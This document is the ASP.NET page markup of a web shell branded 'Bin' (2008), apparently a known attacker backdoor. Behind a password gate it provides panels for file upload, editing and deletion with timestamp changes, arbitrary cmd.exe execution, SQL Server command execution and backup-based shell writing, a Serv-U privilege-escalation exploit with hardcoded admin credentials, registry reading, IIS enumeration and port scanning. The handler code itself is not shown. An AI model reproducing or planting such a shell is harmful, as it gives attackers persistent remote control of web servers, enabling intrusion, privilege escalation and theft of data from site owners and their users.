?%@ Page Language="C#" Debug="true" trace="false" validateRequest="false" %> <%@ import Namespace="System.IO" %> <%@ import Namespace="System.Diagnostics" %> <%@ import Namespace="System.Data" %> <%@ import Namespace="System.Data.OleDb" %> <%@ import Namespace="Microsoft.Win32" %> <%@ import Namespace="System.Net.Sockets" %> <%@ Assembly Name="System.DirectoryServices, Version=2.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" %> <%@ import Namespace="System.DirectoryServices" %> 笑佛天下 - 傲不可长 欲不可纵 乐不可极 志不可满 …?/title> <style type="text/css"> A:link { COLOR:#000000; TEXT-DECORATION:None } A:visited { COLOR:#000000; TEXT-DECORATION:None } A:active { COLOR:#000000; TEXT-DECORATION:None } A:hover { COLOR:#000000; TEXT-DECORATION:underline } BODY { FONT-SIZE: 9pt; FONT-FAMILY: "Courier New"; } #nei { width:500px; margin:0px auto; overflow:hidden } #su { width:300px; margin:0px auto; overflow:hidden } #cmd { width:500px; margin:0px auto; overflow:hidden } </style> <script type="text/javascript" language="javascript" > function Command(cmd, str) { var strTmp = str; var frm = document.forms[0]; if(cmd == 'del') { if(confirm('Del It ?')) { frm.todo.value = str; frm.goaction.value = cmd; frm.submit(); } else return; } if (cmd == 'change') { frm.todo.value = str; frm.goaction.value = cmd; frm.submit(); } if (cmd == 'down') { frm.todo.value = str; frm.goaction.value = cmd; frm.submit(); } if (cmd == 'showatt') { frm.todo.value = str; frm.goaction.value = cmd; frm.submit(); } if (cmd == 'edit') { frm.todo.value = str; frm.goaction.value = cmd; frm.submit(); } if (cmd == 'deldir') { if(confirm('Del It ?')) { frm.todo.value = str; frm.goaction.value = cmd; frm.submit(); } else return; } if(cmd == 'rename' ) { frm.goaction.value = cmd; frm.todo.value = str + ','; str = prompt('Please input new filename:', strTmp); if(str && (strTmp != str)) { frm.todo.value += str; frm.submit(); } else return; } if(cmd == 'renamedir' ) { frm.goaction.value = cmd; frm.todo.value = str + ','; str = prompt('Please input new foldername:', strTmp); if(str && (strTmp != str)) { frm.todo.value += str; frm.submit(); } else return; } if (cmd == 'postdata') { frm.todo.value = str.value; frm.goaction.value = cmd; frm.submit(); } if (cmd == 'changedata') { frm.todo.value = str.value; frm.intext.value = str.options[str.selectedIndex].innerText frm.goaction.value = cmd; frm.submit(); } } </script> </head> <body> <form id="form1" runat="server"><div style="text-align: center"><asp:Panel ID="Bin_LoginPanel" runat="server" Height="47px" Width="401px"> <asp:Label ID="PassLabel" runat="server" Text="Password:"></asp:Label> <asp:TextBox ID="passtext" runat="server" TextMode="Password" Width="203px"></asp:TextBox> <asp:Button ID="LoginButton" runat="server" Text="Enter" OnClick="LoginButton_Click" /><p /> Copyright (C) 2008 Bin -> <a href="http://www.g.cn" target="_blank">WwW.G.Cn</a></asp:Panel><asp:Panel ID="Bin_MenuPanel" runat="server" Height="56px" Width="771px"> <asp:Label ID="TimeLabel" runat="server" Text="Label" Width="150px"></asp:Label><br /> <asp:Button ID="MainButton" runat="server" OnClick="MainButton_Click" Text="Sysinfo" /> <asp:Button ID="Bin_IISButton" runat="server" OnClick="Bin_IISButton_Click" Text="IISSpy" /> <asp:Button ID="FileButton" runat="server" OnClick="FileButton_Click" Text="WebShell" /> <asp:Button ID="Bin_CmdButton" runat="server" Text="Command" OnClick="Bin_CmdButton_Click" /> <asp:Button ID="Bin_SQLButton" runat="server" OnClick="Bin_SQLButton_Click" Text="SqlTools" /> <asp:Button ID="Bin_SuButton" runat="server" OnClick="Bin_SuButton_Click" Text="SuExp" /> <asp:Button ID="Bin_PortButton" runat="server" Text="PortScan" OnClick="Bin_PortButton_Click" /> <asp:Button ID="Bin_RegButton" runat="server" Text="RegShell" OnClick="Bin_RegButton_Click" /> <asp:Button ID="LogoutButton" runat="server" OnClick="LogoutButton_Click" Text="Logout" /><br /> <asp:Label ID="Bin_ErrorLabel" runat="server" EnableViewState="False">Copyright (C) 2008 Bin -> <a href="http://www.rootkit.net.cn" target="_blank">WwW.RoOTkIt.NeT.Cn</a> -> <a href="http://www.rootkit.net.cn/index.aspx" target="_blank">Reverse-IP</a> </asp:Label></asp:Panel> <asp:Panel ID="Bin_MainPanel" runat="server" Width="769px" EnableViewState="False" Visible="False" Height="20px"> <div style="text-align: left"><asp:Label ID="InfoLabel" runat="server" Width="765px" EnableViewState="False" ></asp:Label></div></asp:Panel><div style="text-align: center"> <asp:Panel ID="Bin_FilePanel" runat="server" Width="767px" EnableViewState="False" Visible="False"><div style="text-align: left"><asp:Label ID="Bin_FileLabel" runat="server" Text="Label" Width="764px"></asp:Label><br /> <asp:Label ID="Bin_UpfileLabel" runat="server" Text="Upfile : "></asp:Label> <input class="TextBox" id="Bin_UpFile" type="file" name="upfile" runat="server" /> <asp:TextBox ID="Bin_upTextBox" runat="server" Width="339px"></asp:TextBox>  <asp:Button ID="Bin_GoButton" runat="server" OnClick="Bin_GoButton_Click" Text="GO" /> <asp:Button ID="Bin_upButton" runat="server" Text="UpLoad" OnClick="Bin_upButton_Click" EnableViewState="False" /><br /> <asp:Label ID="Bin_CreateLabel" runat="server" Text="Create :"></asp:Label> <asp:TextBox ID="Bin_CreateTextBox" runat="server"></asp:TextBox><asp:Button ID="Bin_NewFileButton" runat="server" Text="NewFile" OnClick="Bin_NewFileButton_Click" /> <asp:Button ID="Bin_NewdirButton" runat="server" Text="NewDir" OnClick="Bin_NewdirButton_Click" /> <br /> <asp:Label ID="Bin_CopyLabel" runat="server" Text="Copy :" Width="39px"></asp:Label>   <asp:TextBox ID="Bin_CopyTextBox" runat="server" Width="273px"></asp:TextBox> <asp:Label ID="Bin_CopytoLable" runat="server" Text="To:"></asp:Label> <asp:TextBox ID="Bin_CopytoTextBox" runat="server" Width="268px"></asp:TextBox> <asp:Button ID="Bin_CopyButton" runat="server" Text="Copy" OnClick="Bin_CopyButton_Click" /> <asp:Button ID="Bin_CutButton" runat="server" Text="Cut" Width="46px" OnClick="Bin_CutButton_Click" /> <asp:Label ID="Bin_FilelistLabel" runat="server" EnableViewState="False"></asp:Label></div><div style="text-align: center"> <asp:Panel ID="Bin_AttPanel" runat="server" Width="765px" Visible="False"><hr /> FileName : <asp:Label ID="Bin_AttLabel" runat="server" Text="Label"></asp:Label><br /> <asp:CheckBox ID="Bin_ReadOnlyCheckBox" runat="server" Text="ReadOnly" /> <asp:CheckBox ID="Bin_SystemCheckBox" runat="server" Text="System" /> <asp:CheckBox ID="Bin_HiddenCheckBox" runat="server" Text="Hidden" /> <asp:CheckBox ID="Bin_ArchiveCheckBox" runat="server" Text="Archive" /> <br /> CreationTime : <asp:TextBox ID="Bin_CreationTimeTextBox" runat="server" Width="123px"></asp:TextBox> LastWriteTime : <asp:TextBox ID="Bin_LastWriteTimeTextBox" runat="server" Width="129px"></asp:TextBox> LastAccessTime : <asp:TextBox ID="Bin_AccessTimeTextBox" runat="server" Width="119px"></asp:TextBox><br /> <asp:Button ID="Bin_SetButton" runat="server" OnClick="Bin_SetButton_Click" Text="Set" /> <asp:Button ID="Bin_SbackButton" runat="server" OnClick="Bin_SbackButton_Click" Text="Back" /> <hr /> </asp:Panel></div> <div style="text-align: center"><asp:Panel ID="Bin_EditPanel" runat="server" Visible="False"><hr style="width: 757px" /> Path:<asp:TextBox ID="Bin_EditpathTextBox" runat="server" Width="455px"></asp:TextBox><br /> <asp:TextBox ID="Bin_EditTextBox" runat="server" TextMode="MultiLine" Columns="100" Rows="25" Width="760px"></asp:TextBox><br /> <asp:Button ID="Bin_EditButton" runat="server" Text="Sumbit" OnClick="Bin_EditButton_Click" /> <asp:Button ID="Bin_BackButton" runat="server" OnClick="Bin_BackButton_Click" Text="Back" /></asp:Panel></div></asp:Panel></div> <asp:Panel ID="Bin_CmdPanel" runat="server" Height="50px" Width="763px"><hr /> CmdPath :  <asp:TextBox ID="Bin_CmdPathTextBox" runat="server" Width="395px">C:\Windows\System32\Cmd.exe</asp:TextBox><br /> Argument : <asp:TextBox ID="Bin_CmdShellTextBox" runat="server" Width="395px">/c Set</asp:TextBox><br /> <asp:Button ID="Bin_RunButton" runat="server" OnClick="Bin_RunButton_Click" Text="Run" /> <div style="text-align: left"> <asp:Label ID="Bin_CmdLabel" runat="server" EnableViewState="False"></asp:Label></div> <hr /></asp:Panel> <asp:Panel ID="Bin_SQLPanel" runat="server" Visible="False" Width="763px"> <hr /> ConnString : <asp:TextBox ID="Bin_SQLconnTextBox" runat="server" Width="547px">server=localhost;UID=sa;PWD=;database=master;Provider=SQLOLEDB</asp:TextBox><br /> <asp:RadioButton ID="Bin_SQLRadioButton" runat="server" AutoPostBack="True" OnCheckedChanged="Bin_SQLRadioButton_CheckedChanged" Text="MS-SQL" Checked="True" /> <asp:RadioButton ID="Bin_AccRadioButton" runat="server" AutoPostBack="True" OnCheckedChanged="Bin_AccRadioButton_CheckedChanged" Text="MS-Access" /> <asp:Button ID="SQL_SumbitButton" runat="server" Text="Sumbit" OnClick="SQL_SumbitButton_Click" /><hr /> <asp:Panel ID="Bin_DBmenuPanel" runat="server" Width="759px" Visible="False"> <asp:Button ID="Bin_BDButton" runat="server" Text="DataBase" OnClick="Bin_BDButton_Click" /> <asp:Button ID="Bin_SACMDButton" runat="server" Text="SA_Exec" OnClick="Bin_SACMDButton_Click" /> <asp:Button ID="Bin_DirButton" runat="server" Text="SQL_Dir" OnClick="Bin_DirButton_Click" /><br /><hr /><div style="text-align: left"> <asp:Label ID="Bin_DBinfoLabel" runat="server" Text="Label" EnableViewState="False"></asp:Label></div></asp:Panel> <asp:Panel ID="Bin_AccPanel" runat="server" Height="50px" Width="759px" EnableViewState="False"> <asp:Label ID="Bin_AccinfoLabel" runat="server" Text="Label" EnableViewState="False"></asp:Label><br /> <asp:TextBox ID="Bin_DBstrTextBox" runat="server" TextMode="MultiLine" Width="569px"></asp:TextBox> <asp:Button ID="Bin_ExecButton" runat="server" OnClick="Bin_ExecButton_Click" Text="Exec" /> <asp:Button ID="Bin_SAexecButton" runat="server" Text="SA_Exec" OnClick="Bin_SAexecButton_Click" /><br /> <div style="text-align:left"> <asp:Label ID="Bin_ResLabel" runat="server" ></asp:Label></div></asp:Panel> <asp:Panel ID="Bin_dirPanel" runat="server" Visible="False" Width="759px"> Path : <asp:TextBox ID="Bin_DirTextBox" runat="server" Width="447px">c:\</asp:TextBox> <br /> <asp:Button ID="Bin_listButton" runat="server" OnClick="Bin_listButton_Click" Text="Dir" /> <asp:Button ID="Bin_dbshellButton" runat="server" OnClick="Bin_dbshellButton_Click" Text="Bak_DB" /> <asp:Button ID="Bin_LogshellButton" runat="server" Text="Bak_LOG" OnClick="Bin_LogshellButton_Click" /><hr /></asp:Panel> <br /><br /> <div style="overflow:scroll; text-align:left; width:770px;" id="Bin_Scroll" runat="server" visible="false" > <asp:DataGrid ID="Bin_DataGrid" runat="server" Width="753px" PageSize="20" CssClass="Bin_DataGrid" OnItemDataBound="Item_DataBound" AllowPaging="True" OnPageIndexChanged="Bin_DBPage" OnItemCommand="Item_Command"> <PagerStyle Mode="NumericPages" Position="TopAndBottom" /> </asp:DataGrid></div> </asp:Panel> <asp:Panel ID="Bin_SuPanel" runat="server" Width="763px" > <hr /> Name : <asp:TextBox ID="Bin_SunameTextBox" runat="server">localadministrator</asp:TextBox> Pass : <asp:TextBox ID="Bin_SupassTextBox" runat="server">#l@$ak#.lk;0@P</asp:TextBox> Port : <asp:TextBox ID="Bin_SuportTextBox" runat="server">43958</asp:TextBox><br /> CMD : <asp:TextBox ID="Bin_SucmdTextBox" runat="server" Width="447px">cmd.exe /c net user</asp:TextBox><br /> <asp:Button ID="Bin_SuexpButton" runat="server" Text="Exploit" OnClick="Bin_SuexpButton_Click" /><br /> <div style="text-align:left"> <hr /> <asp:Label ID="Bin_SuresLabel" runat="server"></asp:Label> </div> </asp:Panel> <asp:Panel ID="Bin_IISPanel" runat="server" Width="763px"><div style="text-align:left"> <hr /> <asp:Label ID="Bin_iisLabel" runat="server" Text="Label" EnableViewState="False"></asp:Label> </div></asp:Panel> <asp:Panel ID="Bin_RegPanel" runat="server" Width="763px"><hr /><div style="text-align:left"> KEY :   <asp:TextBox ID="Bin_KeyTextBox" runat="server" Width="595px">HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName</asp:TextBox><br /> VALUE : <asp:TextBox ID="Bin_ValueTextBox" runat="server" Width="312px">ComputerName</asp:TextBox> <asp:Button ID="Bin_RegreadButton" runat="server" Text="Read" OnClick="Bin_RegreadButton_Click" /><br /> <asp:Label ID="Bin_RegresLabel" runat="server"></asp:Label><hr /></div></asp:Panel> <asp:Panel ID="Bin_PortPanel" runat="server" Width="763px"> <hr /><div style="text-align:left"> IP : <asp:TextBox ID="Bin_ScanipTextBox" runat="server" Width="194px">127.0.0.1</asp:TextBox> PORT : <asp:TextBox ID="Bin_PortsTextBox" runat="server" Width="356px">21,80,1433,3306,3389,4899,5631,43958,65500</asp:TextBox> <asp:Button ID="Bin_ScancmdButton" runat="server" Text="Scan" OnClick="Bin_ScancmdButton_Click" /><br /> <asp:Label ID="Bin_ScanresLabel" runat="server"></asp:Label></div><hr /></asp:Panel> </div></form> </body> </html>